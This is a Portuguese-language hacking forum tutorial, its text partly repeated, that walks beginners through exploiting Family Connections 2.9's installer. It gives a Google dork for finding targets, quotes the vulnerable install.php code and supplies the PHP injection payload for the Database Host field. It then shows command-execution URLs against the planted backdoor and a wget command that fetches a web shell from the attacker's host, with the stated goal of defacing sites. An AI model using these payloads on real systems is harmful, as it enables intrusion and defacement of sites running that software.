Hoje (28/03/2012) foi notificado uma vulnerabilidade na plataforma Family Connections 2.9
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
O intuito do tópico é demonstrar para os mais iniciantes onde encontrar novas vulnerabilidades e como explorá-las. Dependendo do seu conhecimento basta vc ler o exploit e entenderá do que se trata e pode parar por aqui.
Provavelmente este post não terá muitas visualizações por seu título não ser tão atraente como
"Upando uma shell facilmente!".
A verdade é que se você pensa apenas no deface, você se limita. Até msm porque o conhecimento leva ao deface e não ao contrário.
É claro que cada um faz oq quiser e isso não é do meu interesse
Sem mais delongas.....
A vulnerabilidade consiste em poder configurar o Database Host possibilitando o RCE.
Primeiramente vamos procurar o alvo:
# Google dork: allintext: "Family Connections 2.9"
Para o tutorial o nosso será o seguinte: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Para podermos fazer essa configuração basta acessarmos o arquivo install.php
Vamos dar uma olhada no código desse arquivo:
A vulnerabilidade ai presente nos permite no Database host colocar um codigo php que vai permitir o RCE.
Então na parte da configuração colocamos:
Database Host -> ';system($_GET['cmd']);'
Database Name -> Qualquer coisa
Database Username -> Qualquer coisa
Database Password -> Qualquer coisa
Dê next e pronto.
Agora basta acessarmos
Agora que vc pode executar os comandos que tal baixar uma shell??
E com isso o seu deface vem ;D
Apesar de parecer não faça disso uma receita de bolo. Use sua critividade e google para fazê-la acontecer.
É isso ai galera quem gosto agradece.
Quem não gosto na próxima eu me esforço mais ;D
Vlw
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
O intuito do tópico é demonstrar para os mais iniciantes onde encontrar novas vulnerabilidades e como explorá-las. Dependendo do seu conhecimento basta vc ler o exploit e entenderá do que se trata e pode parar por aqui.
Provavelmente este post não terá muitas visualizações por seu título não ser tão atraente como
"Upando uma shell facilmente!".
A verdade é que se você pensa apenas no deface, você se limita. Até msm porque o conhecimento leva ao deface e não ao contrário.
É claro que cada um faz oq quiser e isso não é do meu interesse
Sem mais delongas.....
A vulnerabilidade consiste em poder configurar o Database Host possibilitando o RCE.
Primeiramente vamos procurar o alvo:
# Google dork: allintext: "Family Connections 2.9"
Para o tutorial o nosso será o seguinte: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Para podermos fazer essa configuração basta acessarmos o arquivo install.php
Código:
http://gcconnections.com/install.php
Código:
Line : 383 { $file = fopen('inc/config_inc.php', 'w') or die("<h1>Error Creating Config File</h1>"); $str = "<?php \$cfg_mysql_host = '".$_POST['dbhost']."'; \$cfg_mysql_db = '".$_POST['dbname']."'; \$cfg_mysql_user = '".$_POST['dbuser']."'; \$cfg_mysql_pass = '".$_POST['dbpass']."'; ?".">"; fwrite($file, $str) or die("<h1>Could not write to config.</h1>"); fclose($file); }
Então na parte da configuração colocamos:
Database Host -> ';system($_GET['cmd']);'
Database Name -> Qualquer coisa
Database Username -> Qualquer coisa
Database Password -> Qualquer coisa
Dê next e pronto.
Agora basta acessarmos
Código:
http://gcconnections.com/inc/config_inc.php?cmd=Seu comando aqui
Código:
http://gcconnections.com/inc/config_inc.php?cmd=wget http://seuhost/suashell.txt http://gcconnections.com/inc/config_inc.php?cmd=mv suashell.txt suashell.php
Código:
http://gcconnections.com/inc/index.html
É isso ai galera quem gosto agradece.
Quem não gosto na próxima eu me esforço mais ;D
Vlw